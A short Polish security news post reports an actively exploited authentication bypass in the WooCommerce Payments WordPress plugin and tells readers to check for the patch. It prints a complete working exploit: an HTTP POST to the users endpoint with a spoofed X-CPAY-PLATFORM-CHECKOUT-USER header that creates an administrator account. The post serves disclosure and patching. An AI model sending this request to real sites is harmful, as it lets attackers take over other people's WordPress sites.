Ciekawa podatność w pluginie do płatności WooCommerce – można jednym nagłówkiem utworzyć nowego admina w WordPress

Podatność w pluginie WooCommerce payments (obecnie ~600k instalacji) została załatana parę miesięcy temu, ale teraz pokazała się ciekawa analiza tej luki. Ponoć podatność jest obecnie aktywnie wykorzystywana.

Dobra informacja jest taka, że producent wydał łatkę z wymuszeniem jej instalacji. Warto sprawdzić czy jesteśmy załatani, bo exploit jest naprawdę prosty i wygląda tak:

POST /wp-json/wp/v2/users HTTP/1.1
Upgrade-Insecure-Requests: 1
Connection: close
Content-Type: application/json
X-CPAY-PLATFORM-CHECKOUT-USER: 1
Content-Length: 123

{
“username”:“hacked”,
“email”:“mrtuxracer@hackerone.com”,
“password”:“SuperSecure1337”,
“roles”:[“administrator”]

}

Lista załatanych wersji pluginu dostępna jest tutaj.

~ms